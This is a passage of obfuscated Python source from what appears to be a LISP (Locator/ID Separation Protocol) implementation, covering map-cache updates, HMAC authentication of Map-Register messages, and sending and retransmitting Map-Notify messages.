if 14 - 14: II111iiii + II111iiii - I11i / I11i . OoOoOO00 + OoO0O00
if 92 - 92: II111iiii - II111iiii % IiII
if 48 - 48: oO0o / II111iiii + oO0o
if 16 - 16: o0oOOo0O0Ooo % II111iiii - i11iIiiIii - IiII + O0 - i11iIiiIii
if 58 - 58: OoooooooOO / I1ii11iIi11i - Oo0Ooo / II111iiii
if 13 - 13: o0oOOo0O0Ooo + OoOoOO00 * ooOoO0o % IiII
if 18 - 18: I1IiiI . I1ii11iIi11i + Oo0Ooo - iII111i
if 53 - 53: ooOoO0o / IiII
if ( IiOo0oOoooO . rloc_probe and I11iiI1III != None ) : OO00O000OOO = I11iiI1III . rloc_set
if 36 - 36: iIii1I11I1II1
if 78 - 78: II111iiii * I11i
if 47 - 47: Ii1I
if 42 - 42: I11i . oO0o - I1IiiI / OoO0O00
if 75 - 75: I1IiiI / OoOoOO00 . I11i * iIii1I11I1II1
ooO = IiIii1Ii
if ( I11iiI1III and OO00O000OOO != I11iiI1III . rloc_set ) :
I11iiI1III . delete_rlocs_from_rloc_probe_list ( )
ooO = True
if 64 - 64: OOooOOo
if 8 - 8: ooOoO0o % o0oOOo0O0Ooo
if 22 - 22: O0 * IiII . OoO0O00
if 63 - 63: oO0o % Oo0Ooo * OoO0O00 / II111iiii / Ii1I - ooOoO0o
if 14 - 14: ooOoO0o . o0oOOo0O0Ooo + II111iiii
i11iIIIi1 = I11iiI1III . uptime if ( I11iiI1III ) else None
if ( I11iiI1III == None ) :
I11iiI1III = lisp_mapping ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group , OO00O000OOO )
I11iiI1III . mapping_source = source
if 66 - 66: iII111i - I1ii11iIi11i / o0oOOo0O0Ooo . Oo0Ooo
if 27 - 27: o0oOOo0O0Ooo % o0oOOo0O0Ooo / ooOoO0o + OoooooooOO * iII111i . I11i
if 2 - 2: iIii1I11I1II1 * I1ii11iIi11i - OoooooooOO
if 93 - 93: iII111i % ooOoO0o * Oo0Ooo
if 34 - 34: O0 * oO0o
if 58 - 58: OOooOOo . iII111i - Oo0Ooo / iII111i . I11i
if ( lisp_i_am_rtr and o0o0Ooo0OO00o . group . is_null ( ) == False ) :
I11iiI1III . map_cache_ttl = LISP_MCAST_TTL
else :
I11iiI1III . map_cache_ttl = o0o0Ooo0OO00o . store_ttl ( )
if 86 - 86: iIii1I11I1II1 - iII111i % Ii1I
I11iiI1III . action = o0o0Ooo0OO00o . action
I11iiI1III . add_cache ( ooO )
if 18 - 18: oO0o / IiII - OOooOOo % Ii1I
if 88 - 88: i11iIiiIii
iII11 = "Add"
if ( i11iIIIi1 ) :
I11iiI1III . uptime = i11iIIIi1
I11iiI1III . refresh_time = lisp_get_timestamp ( )
iII11 = "Replace"
if 20 - 20: I1Ii111 . iII111i * I1ii11iIi11i + OoooooooOO
if 56 - 56: OOooOOo * I1Ii111 % OOooOOo + Ii1I
lprint ( "{} {} map-cache with {} RLOCs" . format ( iII11 ,
green ( I11iiI1III . print_eid_tuple ( ) , False ) , len ( OO00O000OOO ) ) )
if 78 - 78: OOooOOo * OoOoOO00
if 20 - 20: IiII
if 17 - 17: o0oOOo0O0Ooo % iIii1I11I1II1
if 66 - 66: OoooooooOO + IiII . II111iiii
if 66 - 66: iIii1I11I1II1 % I11i
if ( lisp_ipc_dp_socket and O0oo0OOo00o0o != None ) :
lisp_write_ipc_keys ( O0oo0OOo00o0o )
if 38 - 38: I1ii11iIi11i * ooOoO0o
if 77 - 77: OOooOOo - i11iIiiIii - I1ii11iIi11i
if 94 - 94: OoO0O00 % iII111i - I1Ii111 + OoO0O00 - I1IiiI
if 65 - 65: OOooOOo
if 90 - 90: O0
if 91 - 91: O0 * OoOoOO00 - OoOoOO00 * II111iiii - iII111i
if 38 - 38: oO0o * I11i % OOooOOo
if ( IiIii1Ii ) :
Oooooo0OOO = bold ( "RLOC-probe" , False )
for iIIiI11 in I11iiI1III . best_rloc_set :
O0O0 = red ( iIIiI11 . rloc . print_address_no_iid ( ) , False )
lprint ( "Trigger {} to {}" . format ( Oooooo0OOO , O0O0 ) )
lisp_send_map_request ( lisp_sockets , 0 , I11iiI1III . eid , I11iiI1III . group , iIIiI11 )
if 70 - 70: oO0o + I1Ii111 % Oo0Ooo
if 46 - 46: oO0o . OoOoOO00
if 31 - 31: OoO0O00 + i11iIiiIii / I11i % O0 / Ii1I
return
if 90 - 90: iIii1I11I1II1 % oO0o % IiII
if 84 - 84: I1IiiI * IiII * iII111i / i1IIi . II111iiii * o0oOOo0O0Ooo
if 1 - 1: oO0o - iIii1I11I1II1 % i1IIi
if 94 - 94: Oo0Ooo + iIii1I11I1II1 . OoO0O00 * oO0o . i1IIi
if 85 - 85: O0 / OoOoOO00 . iII111i
if 64 - 64: OoO0O00 + I1ii11iIi11i / OoO0O00 * I1Ii111 . Oo0Ooo
if 5 - 5: iII111i - iIii1I11I1II1 * IiII
if 52 - 52: OOooOOo
def lisp_compute_auth ( packet , map_register , password ) :
if ( map_register . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if 50 - 50: OoOoOO00 % o0oOOo0O0Ooo - II111iiii - i1IIi
packet = map_register . zero_auth ( packet )
II1Iii1iI = lisp_hash_me ( packet , map_register . alg_id , password , False )
if 35 - 35: Oo0Ooo - ooOoO0o % OoO0O00
if 26 - 26: i1IIi * I1Ii111 * OoO0O00 - IiII
if 26 - 26: Oo0Ooo - ooOoO0o . iII111i * OoOoOO00 / OoooooooOO
if 66 - 66: I1IiiI
map_register . auth_data = II1Iii1iI
packet = map_register . encode_auth ( packet )
return ( packet )
if 45 - 45: II111iiii * I1Ii111 - II111iiii / I1IiiI % oO0o
if 83 - 83: oO0o % OoO0O00 + I1ii11iIi11i / OoooooooOO % iII111i
if 22 - 22: I1Ii111
if 41 - 41: O0 * i1IIi
if 89 - 89: iIii1I11I1II1 . I11i % I1ii11iIi11i + II111iiii . OoO0O00
if 5 - 5: I1ii11iIi11i / I1IiiI . iII111i
if 7 - 7: Ii1I
def lisp_hash_me ( packet , alg_id , password , do_hex ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 62 - 62: I1ii11iIi11i + IiII . O0 - OoooooooOO * o0oOOo0O0Ooo % O0
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
O0O0O00 = hashlib . sha1
if 31 - 31: IiII
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
O0O0O00 = hashlib . sha256
if 43 - 43: OoOoOO00 . OoooooooOO + OoooooooOO - IiII . OoOoOO00
if 56 - 56: I11i
if ( do_hex ) :
II1Iii1iI = hmac . new ( password . encode ( ) , packet , O0O0O00 ) . hexdigest ( )
else :
II1Iii1iI = hmac . new ( password . encode ( ) , packet , O0O0O00 ) . digest ( )
if 75 - 75: ooOoO0o . oO0o . OoOoOO00
return ( II1Iii1iI )
if 72 - 72: I11i % ooOoO0o / O0 . O0
if 7 - 7: O0 * I1ii11iIi11i + Ii1I + oO0o % oO0o
if 47 - 47: oO0o * I1ii11iIi11i
if 85 - 85: OoooooooOO * I1ii11iIi11i + i11iIiiIii . iII111i * II111iiii / oO0o
if 14 - 14: I1Ii111
if 49 - 49: I1IiiI . OOooOOo / OoooooooOO + I11i - I11i
if 27 - 27: Ii1I / o0oOOo0O0Ooo . iIii1I11I1II1 . I1IiiI - OoO0O00
if 28 - 28: ooOoO0o
def lisp_verify_auth ( packet , alg_id , auth_data , password ) :
if ( alg_id == LISP_NONE_ALG_ID ) : return ( True )
if 88 - 88: oO0o
II1Iii1iI = lisp_hash_me ( packet , alg_id , password , True )
o0o0Oo = ( II1Iii1iI == auth_data )
if 76 - 76: OoOoOO00 / iII111i * ooOoO0o . i1IIi
if 28 - 28: I11i . I1ii11iIi11i
if 80 - 80: OoO0O00 - OoooooooOO * i11iIiiIii
if 20 - 20: OoO0O00 . II111iiii
if ( o0o0Oo == False ) :
lprint ( "Hashed value: {} does not match packet value: {}" . format ( II1Iii1iI , auth_data ) )
if 70 - 70: i11iIiiIii % Ii1I * IiII / IiII . o0oOOo0O0Ooo
if 52 - 52: o0oOOo0O0Ooo % I11i
return ( o0o0Oo )
if 58 - 58: i11iIiiIii % Ii1I + Oo0Ooo - OoOoOO00 - i11iIiiIii / O0
if 36 - 36: OOooOOo
if 42 - 42: OOooOOo * ooOoO0o * i11iIiiIii + OoooooooOO . iIii1I11I1II1
if 95 - 95: i1IIi * O0 / II111iiii * OoOoOO00 * I1IiiI
if 38 - 38: OOooOOo - OoOoOO00 / OoO0O00 / o0oOOo0O0Ooo - i11iIiiIii
if 4 - 4: I1IiiI * o0oOOo0O0Ooo - I11i - OoooooooOO . OoooooooOO
if 79 - 79: oO0o - iII111i
def lisp_retransmit_map_notify ( map_notify ) :
IIi11ii = map_notify . etr
ooO0 = map_notify . etr_port
if 34 - 34: OoooooooOO + Ii1I - iII111i + OoooooooOO / I1IiiI
if 39 - 39: o0oOOo0O0Ooo . i1IIi * OoO0O00 / II111iiii / I1ii11iIi11i * OOooOOo
if 39 - 39: O0 . OOooOOo
if 95 - 95: I11i
if 58 - 58: I1ii11iIi11i / i11iIiiIii + iII111i + I11i / oO0o
if ( map_notify . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "Map-Notify with nonce 0x{} retry limit reached for ETR {}" . format ( map_notify . nonce_key , red ( IIi11ii . print_address ( ) , False ) ) )
if 8 - 8: I1ii11iIi11i
if 100 - 100: OoooooooOO / I11i - Ii1I
III = map_notify . nonce_key
if ( III in lisp_map_notify_queue ) :
map_notify . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( III ) )
if 11 - 11: OoO0O00
try :
lisp_map_notify_queue . pop ( III )
except :
lprint ( "Key not found in Map-Notify queue" )
if 20 - 20: Oo0Ooo
if 34 - 34: I1Ii111 % i11iIiiIii / oO0o - i1IIi . o0oOOo0O0Ooo / oO0o
return
if 68 - 68: I1Ii111 % Ii1I * Oo0Ooo - O0 . IiII
if 1 - 1: I1ii11iIi11i
IiI11IIIIIi = map_notify . lisp_sockets
map_notify . retry_count += 1
if 18 - 18: i11iIiiIii % OoO0O00 % OOooOOo . OOooOOo * Ii1I / II111iiii
lprint ( "Retransmit {} with nonce 0x{} to xTR {}, retry {}" . format ( bold ( "Map-Notify" , False ) , map_notify . nonce_key ,
# Ii1I + OoooooooOO * I11i * OoOoOO00 + OoO0O00
red ( IIi11ii . print_address ( ) , False ) , map_notify . retry_count ) )
if 87 - 87: I1Ii111 / O0 % O0 * o0oOOo0O0Ooo / II111iiii
lisp_send_map_notify ( IiI11IIIIIi , map_notify . packet , IIi11ii , ooO0 )
if ( map_notify . site ) : map_notify . site . map_notifies_sent += 1
if 25 - 25: I1ii11iIi11i * ooOoO0o + I11i + iIii1I11I1II1 / iIii1I11I1II1
if 76 - 76: iII111i
if 85 - 85: I1ii11iIi11i + OOooOOo % i1IIi
if 13 - 13: OOooOOo + i11iIiiIii / OOooOOo . O0 . OoO0O00 - Ii1I
map_notify . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ map_notify ] )
map_notify . retransmit_timer . start ( )
return
if 31 - 31: OoOoOO00 * o0oOOo0O0Ooo / O0 . iII111i / i11iIiiIii
if 22 - 22: I1IiiI . OoooooooOO * I1ii11iIi11i + i11iIiiIii - O0 + i11iIiiIii
if 98 - 98: OOooOOo + I1IiiI / IiII / OoooooooOO / OOooOOo
if 8 - 8: OoooooooOO * OOooOOo * iII111i - iII111i
if 32 - 32: I1Ii111
if 28 - 28: I11i . i11iIiiIii % iIii1I11I1II1 + OoOoOO00
if 4 - 4: OOooOOo + I1ii11iIi11i - iII111i + OOooOOo / IiII
def lisp_send_merged_map_notify ( lisp_sockets , parent , map_register ,
eid_record ) :
if 23 - 23: iIii1I11I1II1 + OoooooooOO + ooOoO0o . iII111i . Oo0Ooo - iIii1I11I1II1
if 25 - 25: O0 + I1IiiI % OOooOOo / Oo0Ooo . IiII / I1Ii111
if 84 - 84: ooOoO0o . O0 + I1IiiI * OoO0O00 - I1IiiI
if 24 - 24: Ii1I
eid_record . rloc_count = len ( parent . registered_rlocs )
IIiiiiI1iIiiI = eid_record . encode ( )
eid_record . print_record ( "Merged Map-Notify " , False )
if 37 - 37: I1IiiI
if 52 - 52: Oo0Ooo / Ii1I * II111iiii / oO0o
if 99 - 99: I11i + ooOoO0o % I11i + O0 - Ii1I - I1Ii111
if 3 - 3: Oo0Ooo . I1IiiI
for OOoO00o0o in parent . registered_rlocs :
ooOoooO = lisp_rloc_record ( )
ooOoooO . store_rloc_entry ( OOoO00o0o )
ooOoooO . local_bit = True
ooOoooO . probe_bit = False
ooOoooO . reach_bit = True
IIiiiiI1iIiiI += ooOoooO . encode ( )
ooOoooO . print_record ( " " )
del ( ooOoooO )
if 99 - 99: iII111i . oO0o + II111iiii % O0
if 40 - 40: iIii1I11I1II1
if 64 - 64: ooOoO0o * OOooOOo % o0oOOo0O0Ooo + I11i
if 64 - 64: Ii1I - iIii1I11I1II1 . iII111i . ooOoO0o * O0
if 3 - 3: I1IiiI % II111iiii
for OOoO00o0o in parent . registered_rlocs :
IIi11ii = OOoO00o0o . rloc
i1111 = lisp_map_notify ( lisp_sockets )
i1111 . record_count = 1
IiII11iI1 = map_register . key_id
i1111 . key_id = IiII11iI1
i1111 . alg_id = map_register . alg_id
i1111 . auth_len = map_register . auth_len
i1111 . nonce = map_register . nonce
i1111 . nonce_key = lisp_hex_string ( i1111 . nonce )
i1111 . etr . copy_address ( IIi11ii )
i1111 . etr_port = map_register . sport
i1111 . site = parent . site
Oo00oo = i1111 . encode ( IIiiiiI1iIiiI , parent . site . auth_key [ IiII11iI1 ] )
i1111 . print_notify ( )
if 12 - 12: I1Ii111 * O0 + I1ii11iIi11i / ooOoO0o + i11iIiiIii * oO0o
if 90 - 90: Oo0Ooo % ooOoO0o + I1Ii111 + OoO0O00 . II111iiii . OoO0O00
if 10 - 10: I1ii11iIi11i - II111iiii * o0oOOo0O0Ooo . OoO0O00 / i11iIiiIii / iII111i
if 42 - 42: O0 . OoooooooOO + Oo0Ooo
III = i1111 . nonce_key
if ( III in lisp_map_notify_queue ) :
IIi1 = lisp_map_notify_queue [ III ]
IIi1 . retransmit_timer . cancel ( )
del ( IIi1 )
if 46 - 46: i11iIiiIii / I1ii11iIi11i
lisp_map_notify_queue [ III ] = i1111
if 30 - 30: Oo0Ooo
if 68 - 68: i1IIi
if 98 - 98: o0oOOo0O0Ooo + I1ii11iIi11i - oO0o + i1IIi
if 85 - 85: I1Ii111 - I1Ii111 . ooOoO0o % I1ii11iIi11i . OOooOOo
lprint ( "Send merged Map-Notify to ETR {}" . format ( red ( IIi11ii . print_address ( ) , False ) ) )
if 98 - 98: iII111i . I1Ii111 % II111iiii
lisp_send ( lisp_sockets , IIi11ii , LISP_CTRL_PORT , Oo00oo )
if 28 - 28: OoOoOO00 * I1ii11iIi11i / Oo0Ooo
parent . site . map_notifies_sent += 1
if 17 - 17: I1Ii111 - OOooOOo . ooOoO0o - i1IIi * ooOoO0o * I1ii11iIi11i
if 16 - 16: I1ii11iIi11i . o0oOOo0O0Ooo * iIii1I11I1II1
if 15 - 15: iII111i + o0oOOo0O0Ooo / IiII
if 33 - 33: OoooooooOO . IiII * o0oOOo0O0Ooo
i1111 . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ i1111 ] )
i1111 . retransmit_timer . start ( )
if 41 - 41: Ii1I . iII111i . o0oOOo0O0Ooo % OoooooooOO % IiII
return
if 81 - 81: IiII * i11iIiiIii + i1IIi + OOooOOo . i1IIi
if 6 - 6: i11iIiiIii - oO0o % OoO0O00 + iIii1I11I1II1
if 69 - 69: IiII
if 13 - 13: i11iIiiIii
if 49 - 49: OoOoOO00
if 61 - 61: I1Ii111 / I1Ii111 / iII111i / ooOoO0o - I1IiiI . o0oOOo0O0Ooo
if 80 - 80: I1IiiI - OOooOOo . oO0o
def lisp_build_map_notify ( lisp_sockets , eid_records , eid_list , record_count ,
source , port , nonce , key_id , alg_id , auth_len , site , map_register_ack ) :
if 75 - 75: oO0o + OoOoOO00 - OoooooooOO
III = lisp_hex_string ( nonce ) + source . print_address ( )
if 38 - 38: I11i / ooOoO0o / OoOoOO00 * OOooOOo . oO0o
if 8 - 8: OoO0O00 . OOooOOo % I1Ii111 * OOooOOo / I1IiiI
if 3 - 3: IiII - I1ii11iIi11i . o0oOOo0O0Ooo
if 39 - 39: oO0o . I1Ii111 + oO0o % OoOoOO00 - i11iIiiIii
if 69 - 69: I11i / OoO0O00
if 73 - 73: i11iIiiIii / i1IIi
lisp_remove_eid_from_map_notify_queue ( eid_list )
if ( III in lisp_map_notify_queue ) :
i1111 = lisp_map_notify_queue [ III ]
I111 = red ( source . print_address_no_iid ( ) , False )
lprint ( "Map-Notify with nonce 0x{} pending for xTR {}" . format ( lisp_hex_string ( i1111 . nonce ) , I111 ) )
if 8 - 8: O0 / OOooOOo + iII111i % iIii1I11I1II1 % iIii1I11I1II1 . ooOoO0o
return
if 47 - 47: OoO0O00 / o0oOOo0O0Ooo / Ii1I * I1IiiI % ooOoO0o / I1Ii111
if 80 - 80: I1Ii111 / O0 * O0
i1111 = lisp_map_notify ( lisp_sockets )
i1111 . record_count = record_count
key_id = key_id
i1111 . key_id = key_id
i1111 . alg_id = alg_id
i1111 . auth_len = auth_len
i1111 . nonce = nonce
i1111 . nonce_key = lisp_hex_string ( nonce )
i1111 . etr . copy_address ( source )
i1111 . etr_port = port
i1111 . site = site
i1111 . eid_list = eid_list
if 40 - 40: OoO0O00 - oO0o / o0oOOo0O0Ooo . oO0o
if 89 - 89: i11iIiiIii - II111iiii
if 67 - 67: IiII % I1Ii111 + i11iIiiIii
if 53 - 53: OOooOOo
if ( map_register_ack == False ) :
III = i1111 . nonce_key
lisp_map_notify_queue [ III ] = i1111
if 95 - 95: oO0o - OOooOOo % I1Ii111 / OoooooooOO % OoooooooOO - O0
if 21 - 21: I1Ii111 . i1IIi - iII111i % I1ii11iIi11i . OOooOOo
if ( map_register_ack ) :
lprint ( "Send Map-Notify to ack Map-Register" )
else :
lprint ( "Send Map-Notify for RLOC-set change" )
if 52 - 52: Ii1I * I1ii11iIi11i
if 21 - 21: I1IiiI . i11iIiiIii - o0oOOo0O0Ooo * II111iiii % iIii1I11I1II1
if 9 - 9: I1ii11iIi11i + I11i
if 20 - 20: iII111i + i1IIi / oO0o % OoooooooOO * OoOoOO00
if 70 - 70: Oo0Ooo - OOooOOo * OOooOOo / o0oOOo0O0Ooo
Oo00oo = i1111 . encode ( eid_records , site . auth_key [ key_id ] )
i1111 . print_notify ( )
if 4 - 4: OoOoOO00 / OoO0O00
if ( map_register_ack == False ) :
o0o0Ooo0OO00o = lisp_eid_record ( )
o0o0Ooo0OO00o . decode ( eid_records )
o0o0Ooo0OO00o . print_record ( " " , False )
if 66 - 66: I1Ii111 / OoOoOO00
if 53 - 53: OoOoOO00 . i11iIiiIii - OoooooooOO
if 92 - 92: O0 - i11iIiiIii + OoO0O00 - OoooooooOO - o0oOOo0O0Ooo
if 25 - 25: oO0o / oO0o / Ii1I / O0
if 56 - 56: ooOoO0o
lisp_send_map_notify ( lisp_sockets , Oo00oo , i1111 . etr , port )
site . map_notifies_sent += 1
if 19 - 19: O0 * I1IiiI + I1ii11iIi11i
if ( map_register_ack ) : return
if 25 - 25: I11i - ooOoO0o / OoO0O00 / iII111i - OoO0O00
if 86 - 86: OoO0O00
if 89 - 89: OoooooooOO % iII111i * I1ii11iIi11i + I1ii11iIi11i . Oo0Ooo
if 4 - 4: I11i
if 8 - 8: IiII
if 1 - 1: ooOoO0o . IiII
i1111 . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ i1111 ] )
i1111 . retransmit_timer . start ( )
return
if 4 - 4: iIii1I11I1II1 % I1IiiI - OoooooooOO / iII111i
if 55 - 55: O0 + iII111i * OoOoOO00 . i11iIiiIii * Ii1I + oO0o
if 66 - 66: i1IIi . I1ii11iIi11i
if 86 - 86: Oo0Ooo
if 48 - 48: OoO0O00
if 55 - 55: OoO0O00 * i1IIi * I11i / iII111i
if 42 - 42: IiII
if 28 - 28: OoOoOO00 + OoOoOO00
def lisp_send_map_notify_ack ( lisp_sockets , eid_records , map_notify , ms ) :
map_notify . map_notify_ack = True
if 53 - 53: II111iiii % i1IIi + ooOoO0o . I1Ii111
if 52 - 52: I1IiiI + I1Ii111 * oO0o / i11iIiiIii * iIii1I11I1II1
if 27 - 27: Oo0Ooo
if 85 - 85: iIii1I11I1II1 . o0oOOo0O0Ooo + oO0o
Oo00oo = map_notify . encode ( eid_records , ms . password )
map_notify . print_notify ( )
if 79 - 79: O0 - iIii1I11I1II1 + i1IIi . I11i
if 21 - 21: II111iiii
if 23 - 23: I11i * i1IIi . oO0o / IiII + o0oOOo0O0Ooo
if 1 - 1: IiII / OoO0O00 . oO0o * I1Ii111 - i11iIiiIii
IIi11ii = ms . map_server
lprint ( "Send Map-Notify-Ack to {}" . format (
red ( IIi11ii . print_address ( ) , False ) ) )
lisp_send ( lisp_sockets , IIi11ii , LISP_CTRL_PORT , Oo00oo )
return
if 50 - 50: oO0o - O0 / I1IiiI . OoOoOO00 . Oo0Ooo
if 30 - 30: IiII . OoO0O00 + Oo0Ooo
if 48 - 48: iIii1I11I1II1 / i11iIiiIii . OoOoOO00 * I11i
if 1 - 1: IiII . OoOoOO00 * o0oOOo0O0Ooo
if 63 - 63: O0 / Ii1I + I1Ii111 % OoO0O00 % OOooOOo * O0
if 35 - 35: OoO0O00 + OoooooooOO % Oo0Ooo / I11i - O0 . i1IIi
if 76 - 76: IiII % I1IiiI * Ii1I / Ii1I / OoooooooOO + Ii1I
if 19 - 19: OoooooooOO
def lisp_send_multicast_map_notify ( lisp_sockets , site_eid , eid_list , xtr ) :
if 88 - 88: I1IiiI % ooOoO0o % Oo0Ooo - O0
i1111 = lisp_map_notify ( lisp_sockets )
i1111 . record_count = 1
i1111 . nonce = lisp_get_control_nonce ( )
i1111 . nonce_key = lisp_hex_string ( i1111 . nonce )
i1111 . etr . copy_address ( xtr )
i1111 . etr_port = LISP_CTRL_PORT
i1111 . eid_list = eid_list
III = i1111 . nonce_key
if 71 - 71: OOooOOo % Ii1I - i11iIiiIii - oO0o . ooOoO0o / I1Ii111
if 53 - 53: iII111i . Oo0Ooo
if 91 - 91: oO0o * OoooooooOO * oO0o % oO0o * II111iiii % I1Ii111
if 8 - 8: Ii1I
if 28 - 28: iII111i / I1ii11iIi11i - OoOoOO00 * Oo0Ooo + Ii1I * OoOoOO00
if 94 - 94: oO0o
lisp_remove_eid_from_map_notify_queue ( i1111 . eid_list )
if ( III in lisp_map_notify_queue ) :
i1111 = lisp_map_notify_queue [ III ]
lprint ( "Map-Notify with nonce 0x{} pending for ITR {}" . format ( i1111 . nonce , red ( xtr . print_address_no_iid ( ) , False ) ) )
if 95 - 95: ooOoO0o * O0 + OOooOOo
return
if 11 - 11: i1IIi / OoOoOO00 + OoOoOO00 + I1ii11iIi11i + OOooOOo
if 21 - 21: ooOoO0o
if 28 - 28: OoOoOO00 + OoOoOO00 - OoOoOO00 / ooOoO0o
if 81 - 81: oO0o
if 34 - 34: o0oOOo0O0Ooo * OOooOOo - i1IIi * o0oOOo0O0Ooo * Oo0Ooo
lisp_map_notify_queue [ III ] = i1111
if 59 - 59: iIii1I11I1II1 / Oo0Ooo % II111iiii
if 55 - 55: ooOoO0o - IiII + o0oOOo0O0Ooo
if 48 - 48: O0 - iIii1I11I1II1 * OOooOOo
if 33 - 33: I11i
O0ooOOOo0O = site_eid . rtrs_in_rloc_set ( )
if ( O0ooOOOo0O ) :
if ( site_eid . is_rtr_in_rloc_set ( xtr ) ) : O0ooOOOo0O = False
if 42 - 42: I1IiiI
if 47 - 47: II111iiii - I1IiiI . oO0o . oO0o
if 94 - 94: OoO0O00 . I1ii11iIi11i / IiII
if 23 - 23: oO0o * I1Ii111 . I1ii11iIi11i
if 65 - 65: i11iIiiIii + Oo0Ooo % I1ii11iIi11i . OOooOOo
o0o0Ooo0OO00o = lisp_eid_record ( )
o0o0Ooo0OO00o . record_ttl = 1440
o0o0Ooo0OO00o . eid . copy_address ( site_eid . eid )
o0o0Ooo0OO00o . group . copy_address ( site_eid . group )
o0o0Ooo0OO00o . rloc_count = 0
for OOOoOoo in site_eid . registered_rlocs :
if ( O0ooOOOo0O ^ OOOoOoo . is_rtr ( ) ) : continue
o0o0Ooo0OO00o . rloc_count += 1
if 22 - 22: ooOoO0o - I1Ii111 + I1Ii111 * OoOoOO00 * Ii1I
Oo00oo = o0o0Ooo0OO00o . encode ( )
if 78 - 78: O0 % Ii1I * OoO0O00 . I11i + I11i
if 86 - 86: i1IIi + I1ii11iIi11i / i1IIi
if 54 - 54: iIii1I11I1II1 * Ii1I
if 13 - 13: OoO0O00 - II111iiii . iII111i + OoOoOO00 / i11iIiiIii
i1111 . print_notify ( )
o0o0Ooo0OO00o . print_record ( " " , False )
if 32 - 32: ooOoO0o / II111iiii / I1ii11iIi11i
if 34 - 34: iIii1I11I1II1
if 47 - 47: OOooOOo * iII111i
if 71 - 71: IiII - OoooooooOO * i11iIiiIii . OoooooooOO % i1IIi . Oo0Ooo
for OOOoOoo in site_eid . registered_rlocs :
if ( O0ooOOOo0O ^ OOOoOoo . is_rtr ( ) ) : continue
ooOoooO = lisp_rloc_record ( )
ooOoooO . store_rloc_entry ( OOOoOoo )
ooOoooO . local_bit = True
ooOoooO . probe_bit = False
ooOoooO . reach_bit = True
Oo00oo += ooOoooO . encode ( )
ooOoooO . print_record ( " " )
if 3 - 3: OoO0O00 + i11iIiiIii + oO0o * IiII
if 19 - 19: iII111i / II111iiii . I1Ii111 * I1IiiI - OOooOOo
if 70 - 70: OoO0O00
if 42 - 42: OoooooooOO - I1Ii111 + I1ii11iIi11i * iII111i * iII111i / OoO0O00
if 85 - 85: O0 . II111iiii
Oo00oo = i1111 . encode ( Oo00oo , "" )
if ( Oo00oo == None ) : return
if 80 - 80: O0 * I11i * I1Ii111
if 89 - 89: Ii1I * OoO0O00 . i1IIi . O0 - IiII - OoOoOO00
if 25 - 25: iII111i + i1IIi
if 64 - 64: IiII % I11i / iIii1I11I1II1
lisp_send_map_notify ( lisp_sockets , Oo00oo , xtr , LISP_CTRL_PORT )
if 66 - 66: Ii1I
if 55 - 55: OOooOOo + I1IiiI + IiII . Ii1I * oO0o
if 71 - 71: IiII - iII111i % I1IiiI * iII111i
if 27 - 27: ooOoO0o - OoO0O00
i1111 . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ i1111 ] )
i1111 . retransmit_timer . start ( )
return
if 83 - 83: iII111i * OoOoOO00 - O0 * Ii1I
if 79 - 79: I11i / iII111i % Ii1I / OoOoOO00 % O0 / IiII
if 32 - 32: IiII * II111iiii . Ii1I
if 68 - 68: I11i / O0
if 6 - 6: oO0o - oO0o . I1IiiI % I1ii11iIi11i
if 22 - 22: Ii1I / I1IiiI / II111iiii
if 31 - 31: II111iiii - Ii1I * OOooOOo - i11iIiiIii / OoooooooOO - I1Ii111
def lisp_queue_multicast_map_notify ( lisp_sockets , rle_list ) :
o00Oo0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 35 - 35: i11iIiiIii . Ii1I
for I1iiIiI1II1ii in rle_list :
OoO0 = lisp_site_eid_lookup ( I1iiIiI1II1ii [ 0 ] , I1iiIiI1II1ii [ 1 ] , True )
if ( OoO0 == None ) : continue
if 15 - 15: Ii1I % I1IiiI + ooOoO0o * IiII % OoOoOO00 / Oo0Ooo
if 35 - 35: i1IIi - i1IIi * I1ii11iIi11i / O0 / Oo0Ooo - ooOoO0o
if 51 - 51: OoO0O00 + Ii1I * o0oOOo0O0Ooo
if 86 - 86: OoOoOO00 - iII111i % OoO0O00 / OOooOOo / O0
if 61 - 61: oO0o + OOooOOo * II111iiii
if 76 - 76: iII111i % I1IiiI % OOooOOo + OOooOOo
if 38 - 38: I1Ii111 * I1Ii111 + iII111i
oo0OooO = OoO0 . registered_rlocs
if ( len ( oo0OooO ) == 0 ) :
Oo0 = { }
for ooOO00o in list ( OoO0 . individual_registrations . values ( ) ) :
for OOOoOoo in ooOO00o . registered_rlocs :
if ( OOOoOoo . is_rtr ( ) == False ) : continue
Oo0 [ OOOoOoo . rloc . print_address ( ) ] = OOOoOoo
if 100 - 100: iIii1I11I1II1 / oO0o
if 26 - 26: OOooOOo / iIii1I11I1II1 / I1Ii111 + I11i - O0 . O0
oo0OooO = list ( Oo0 . values ( ) )
if 20 - 20: oO0o * O0 * Oo0Ooo
if 81 - 81: OoO0O00 . ooOoO0o
if 78 - 78: II111iiii - i11iIiiIii . OOooOOo
if 22 - 22: Oo0Ooo + ooOoO0o
if 71 - 71: OOooOOo . Ii1I * i11iIiiIii . I11i
if 9 - 9: O0 / I1ii11iIi11i . iII111i . O0 + IiII % I11i
IiiIIiIi = [ ]
ooooO0oOOOOO = False
if ( OoO0 . eid . address == 0 and OoO0 . eid . mask_len == 0 ) :
ooo = [ ]
IiI1Iiii = [ ]
if ( len ( oo0OooO ) != 0 and oo0OooO [ 0 ] . rle != None ) :
IiI1Iiii = oo0OooO [ 0 ] . rle . rle_nodes
if 7 - 7: OoOoOO00 + OoO0O00 * I1IiiI
for iIIi in IiI1Iiii :
IiiIIiIi . append ( iIIi . address )
ooo . append ( iIIi . address . print_address_no_iid ( ) )
if 63 - 63: I1ii11iIi11i + iII111i * i1IIi
